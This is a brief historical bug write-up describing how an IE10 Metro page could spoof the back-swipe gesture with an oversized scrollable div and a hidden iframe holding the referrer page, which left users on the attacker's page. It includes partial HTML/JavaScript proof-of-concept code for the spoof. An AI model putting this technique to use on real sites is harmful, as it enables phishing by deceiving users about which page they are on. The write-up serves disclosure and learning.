IE10 Metro: Back Gesture Can Be Spoofed with Oversized Scrollable Div and iframe

I found that an evil page could trick touch-screen users who performed the back swipe gesture (moving a finger right to go back) by creating an oversized horizontally-scrollable container with the referrer page loaded in a hidden iframe. When the user swiped right, the page smoothly “scrolled” to reveal what appeared to be the previous page — but was actually the iframe — while the user remained on the evil page the whole time.

<!-- evil.html -->
<div id="trickyLayer" style="overflow:scroll;width:110%;height:110%;position:absolute;top:0px;left:0px">
    <div style="position:absolute;width:200%;height:100%;">
        <iframe id="trickyiFrame" style="position:absolute;top:0px;left:0px;"></iframe>
        <div id="evilPageContent" style="position:absolute;top:0px;left:0px;">
            <h1>This is an EVIL page</h1>
        </div>
    </div>
</div>
<script>
window[0].location = document.referrer; // Load the referrer in the hidden iframe.
document.all.evilPageContent.style.posLeft = width; // Evil content starts scrolled off-screen.
document.all.trickyLayer.scrollLeft = width; // Start scrolled to show evil content.

document.all.trickyLayer.onscroll = function(e)
{
    // When scroll ends, either animate "back" or snap back to evil content.
    clearTimeout(timer);
    timer = setTimeout("setCancelBack()", 500);
}
</script>

The evil page positioned itself on the right side of an oversized div, with the iframe (showing the referrer) on the left. When the user swiped right, scrollLeft decreased, revealing the iframe — animating exactly like a real navigation back. If the user released early, the animation was cancelled; otherwise it stopped at the iframe, showing the previous page’s content while the address bar still read evil.com.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.